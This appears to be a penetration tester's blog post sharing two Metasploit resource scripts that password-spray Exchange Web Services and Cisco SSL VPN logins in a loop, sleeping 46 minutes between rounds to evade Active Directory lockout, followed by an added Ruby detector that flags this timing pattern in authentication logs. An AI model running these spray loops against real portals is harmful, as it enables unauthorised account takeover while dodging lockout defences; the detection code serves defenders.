As is common with most penetration tests, my initial footholds typically come from public-facing authentication portals such as Webmail and VPNs. Most of these portals are tied to the organization's Active Directory and are subject to account lockout.

While these modules and vectors (EWS/VPN) are nothing new, looping them with built-in sleep timers allows you to 'set it and forget it' while playing nicely with account lockout policies. In addition, the Cisco SSL module works well (thanks JClaudius) compared to older/non-maintained tools.

MSF.rc

Simply replace the $VARIABLES, call Metasploit and reference the RC file to get going. Spawn it in a SCREEN session, detach and wait for Bob to become your uncle.

msfconsole -r <resource-script.rc>

Exchange Web Service (Autobrute)

ews-autobrute.rc

<ruby>
run_single("spool ewsbrute-loop.txt")
run_single("use auxiliary/scanner/http/owa_ews_login")
run_single("set RHOSTS $TARGET")
run_single("set RPORT 443")
run_single("set AD_DOMAIN $DOMAIN")
run_single("set USER_FILE flast.txt")
run_single("set verbose true")
File.open("passwords.txt", "r") do |file_handle|
  file_handle.each_line do |pass|
    run_single(%Q[set PASSWORD #{pass}])
    run_single("exploit")
    sleep 2760 # Sleep for 46 minutes to make AD happy
  end
end
</ruby>

Cisco SSL VPN (Autobrute)

cisco_ssl_autobrute.rc

<ruby>
run_single("spool vpn-brute-log.txt")
run_single("use auxiliary/scanner/http/cisco_ssl_vpn")
run_single("set GROUP $GROUPID")
run_single("set RHOSTS $TARGET")
run_single("set RPORT 443")
run_single("set USER_FILE Users")
run_single("set verbose true")
File.open("owa-brute.txt", "r") do |file_handle|
  file_handle.each_line do |pass|
    run_single(%Q[set PASSWORD #{pass}])
    run_single("exploit")
    sleep 2760 # Sleep for 46 minutes to make AD happy
  end
end
</ruby>
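
On the defending side, the loops above leave a recognisable shape in authentication logs: one source fails once against many accounts, goes quiet for a fixed pause, then repeats. The following is an added example, not part of the original post or of Metasploit, that finds that shape in a constructed log; the log format, field names, thresholds and sample addresses are all assumptions.

```ruby
require "time"

ROUND_GAP    = 600 # seconds of silence that separates two rounds (assumed threshold)
MIN_USERS    = 4   # distinct accounts in one round before it counts as a spray (assumed)
MAX_PER_USER = 2   # a spray tries each account only once or twice per round (assumed)

# Parse "TIMESTAMP src=IP user=NAME result=FAIL|OK" lines (constructed format); keep failures.
def parse_failures(log)
  log.each_line.filter_map do |line|
    m = line.match(/\A(\S+) src=(\S+) user=(\S+) result=FAIL\s*\z/) or next
    { at: Time.iso8601(m[1]), src: m[2], user: m[3] }
  end
end

# Split one source's failures into rounds wherever it goes quiet for more than ROUND_GAP.
def rounds_for(events)
  events.sort_by { |e| e[:at] }.slice_when { |a, b| b[:at] - a[:at] > ROUND_GAP }.to_a
end

# A round looks like a spray when it touches many accounts but each only a few times.
def spray_round?(round)
  per_user = round.group_by { |e| e[:user] }
  per_user.size >= MIN_USERS && per_user.values.all? { |tries| tries.size <= MAX_PER_USER }
end

# Returns { source => [pause in seconds between consecutive spray rounds] } for
# sources with two or more spray rounds.
def detect_slow_spray(log)
  parse_failures(log).group_by { |e| e[:src] }.each_with_object({}) do |(src, evs), out|
    rounds = rounds_for(evs).select { |r| spray_round?(r) }
    next if rounds.size < 2
    out[src] = rounds.each_cons(2).map { |a, b| (b.first[:at] - a.last[:at]).round }
  end
end

# Constructed sample data: three rounds from 203.0.113.7 with a 2760 s pause between
# them, plus one user mistyping a password three times from 198.51.100.20.
T0 = Time.iso8601("2024-05-01T09:00:00Z")
SPRAY = (0..2).flat_map do |r|
  %w[asmith bjones cwu dlee].each_with_index.map do |user, i|
    "#{(T0 + r * 2763 + i).iso8601} src=203.0.113.7 user=#{user} result=FAIL"
  end
end
NOISE = (0..2).map { |i| "#{(T0 + 30 * i).iso8601} src=198.51.100.20 user=asmith result=FAIL" }
SAMPLE_LOG = (SPRAY + NOISE).join("\n")

p detect_slow_spray(SAMPLE_LOG)
```

Near-identical pauses between rounds, as in the sample, point to a scripted timer rather than users mistyping passwords.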

I've added these RC files to my scripts folder on GitHub. Got other creative ways to make Metasploit more effective? Hit me up on the Twitter.

-Travis